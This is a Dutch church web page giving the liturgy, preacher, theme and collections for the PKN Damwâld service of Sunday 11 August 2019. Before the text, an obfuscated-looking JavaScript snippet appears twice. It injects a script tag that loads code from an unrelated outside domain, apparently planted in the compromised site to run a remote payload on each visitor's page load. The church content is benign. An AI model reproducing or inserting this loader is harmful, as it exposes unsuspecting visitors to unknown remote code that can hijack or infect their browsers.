;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 11 augustus 2019 9:30 uur - PKN Damwâld
zondag 11 augustus 2019
09:30 uur

Kerkdienst zondag 11 augustus 2019 9:30 uur

Thema: Zingen is goed voor je ziel

Informatie

Voorganger:Ds. P. W. Hulshof, Jubbega
Thema:Zingen is goed voor je ziel
Liturgie
Lied voor de dienst Elb 218 : 1, 2 en 3
Welkom
Intochtslied : Psalm 84: 1, 2
Begroeting
We zingen: Gez. 255: 1
Gebed
Inleiding op het thema
We zingen: ELB 168: 1,2,3,4,7
We lezen: Psalm 147
We zingen: Psalm 147: 1,3
Preek Zingen is goed voor je ziel
We zingen: Gez. 448: 1,2,3,4
Dankgebed
Collecte
Slotlied : Gez. 304: 1,3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Diaconaal doel
Tweede collecte: Kerk
Uitganscollecte: Kerk